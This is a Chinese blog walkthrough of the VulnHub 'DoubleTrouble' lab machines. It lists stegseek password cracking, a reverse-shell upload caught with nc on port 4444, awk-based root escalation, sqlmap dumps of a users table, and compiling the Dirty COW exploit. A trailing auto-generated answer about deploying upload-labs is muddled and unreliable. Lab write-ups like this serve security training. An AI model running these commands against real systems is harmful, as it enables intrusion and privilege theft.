vlunhub系列-dobletrouble靶机

dobletrouble靶机

主机发现

在这里插入图片描述

端口扫描

在这里插入图片描述

只有22和80端口

在这里插入图片描述

需要账户名,密码,我们不知道,我们去看源码
在这里插入图片描述

在这里插入图片描述

并没有可以利用的信息,我们接着开始进行目录探测
在这里插入图片描述

探测出一些目录,我们去看一下
在这里插入图片描述

我们在install这里发现了一个数据库,需要创建数据库

在这里插入图片描述

我们在secret目录下面发现了一个图片
在这里插入图片描述

我们在core这个目录下面发现了很多敏感的文件,

在这里插入图片描述

但是并没有什么可以利用的文件

在这里插入图片描述

这里有一个bat文件,但是也没有什么可以利用的东西。

那就从这个图片开始入手,看看有没有图片隐写。
在这里插入图片描述

对这个图片进行分解

使用steghide进行分解,如果没有就是用apt-get下载。

在这里插入图片描述

这里需要密码,但是我们并不知道密码,所以我们可以使用stegseek工具对图片进行爆破

https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb 这里是stegseek的下载地址

使用wget即可

wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb

在这里插入图片描述

\# apt install /root/下载/stegseek_0.6-1.deb

成功下载完成以后我们开始对图片进行爆破

在这里插入图片描述

使用这个参数

stegseek --crack /root/下载/doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf  tupian.txt 
--crack 是使用文字列表破解文件,默认模式  后面使用的是rockyou.txt这个字典  -xf 是讲破解出的信息存放到指定的文件里。

在这里插入图片描述

在这里插入图片描述

这里是一个邮箱和密码 otisrush@localhost.com     otis666 

并且我们找到了刚刚图片隐写的密码,92camaro  

这里我们就发现了邮箱密码,我们可以去登陆一下80的http服务

在这里插入图片描述

这里成功登陆
在这里插入图片描述

这好像是一个管理后台,我们找找看有没有什么可以利用的东西。

在这里插入图片描述

这里好像是可以上传一个文件,这里我们就可以直接上换一个shell利用反弹shell拿下。
在这里插入图片描述

这里直接利用kali自带的shell,然后我们使用kali的ip 使用4444端口

在这里插入图片描述

直接将其传入

在这里插入图片描述

成功的传入

在这里插入图片描述

这里我们可以直接使用nc

在这里插入图片描述

成功反弹

在这里插入图片描述

python -c 'import pty;pty.spawn("/bin/bash")'  使用python生成交互式

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z58CXx67-1677739965314)(file:///C:\Users\Lenovo\AppData\Local\Temp\ksohtml19656\wps171.jpg)]

但是并非root权限,我们需要得到root权限。

在这里插入图片描述

这里我们发现可以使用awk来提权

https://gtfobins.github.io/  使用这个网址可以查看具体的方法

在这里插入图片描述

这里有具体的方法

在这里插入图片描述

这里给出我们提示,我们可以使用这个

awk 'BEGIN {system("/bin/sh")}'  这是bin/sh  我们可以修改为bin/bash

awk 'BEGIN {system("/bin/bash")}'

在这里插入图片描述

这里成功拿下root权限
在这里插入图片描述

在/root中我们又发现了一个ova的镜像,我们可以将其放到本地看看,然后打开看看。

在这里插入图片描述

这里开放80http服务,所以直接将其放到我们的网站根目录下就可以了。
在这里插入图片描述

我们使用宿主机访问,得到这个ova镜像,然后将其打开

在这里插入图片描述

成功创建
在这里插入图片描述

那我们继续进行主机发现

在这里插入图片描述

找到了这个主机,我们端口扫描,目录探测

在这里插入图片描述

同样开放80以及22

在这里插入图片描述

这里需要账户名以及密码,我们进行目录探测
在这里插入图片描述

但是这里并没有一些可以利用的信息,那这里我们尝试使用SQL注入吧

sqlmap -u "http://192.168.12.113/"

在这里插入图片描述

这里提示我们不是get请求,让我们使用--forms选项。

\# sqlmap -u "http://192.168.12.113/" --forms --batch

  使用batch默认为y

在这里插入图片描述

这里提示我们存在基于时间的盲注,存在注入点,payload都告诉我们了

那我们就可以直接爆破了

sqlmap -u "http://192.168.12.113/" --forms --batch --current-db  爆破当前数据库名

sqlmap -u "http://192.168.12.113/" --forms --batch -D doubletrouble --tables  爆破数据库中表名

sqlmap -u "http://192.168.12.113/" --forms --batch -D doubletrouble -T users --columns  爆破表中的字段名

sqlmap -u "http://192.168.12.113/" --forms --batch -D doubletrouble -T users --dump  爆出users表中所有字段的全部内容

数据库名为doubletrouble

在这里插入图片描述

表名为users
在这里插入图片描述

字段为password以及username

在这里插入图片描述

字段内容为montreux:GfsZxc1  clapton:ZubZub99

在这里插入图片描述

这里得到了两个用户,我们用80端口http服务登陆看一下

在这里插入图片描述

这里两个都登陆不上,这里我们想到了22端口的ssh服务,我们可以登陆一下试试

在这里插入图片描述

我们看到使用montreux登录不上,使用clapton成功登陆
在这里插入图片描述

我们需要提权

在这里插入图片描述

不能使用sudo了

在这里插入图片描述

这里我们发现他的内核版本是linux3.2的

我们使用msf自带的漏洞库去看

searchsploit linux kernel 3.2

在这里插入图片描述

我们使用这个40616 脏牛提权

在这里插入图片描述在这里插入图片描述

我们去查看使用方法

在这里插入图片描述

使用gcc对其进行编译,然后执行编译的即可

但是我们需要将其传输到这个系统中,我们使用wget

在这里插入图片描述
在这里插入图片描述

我们将其使用gcc编译

在这里插入图片描述

而后执行
在这里插入图片描述

成功拿下

希望对各位有帮助!

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 [email protected]` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值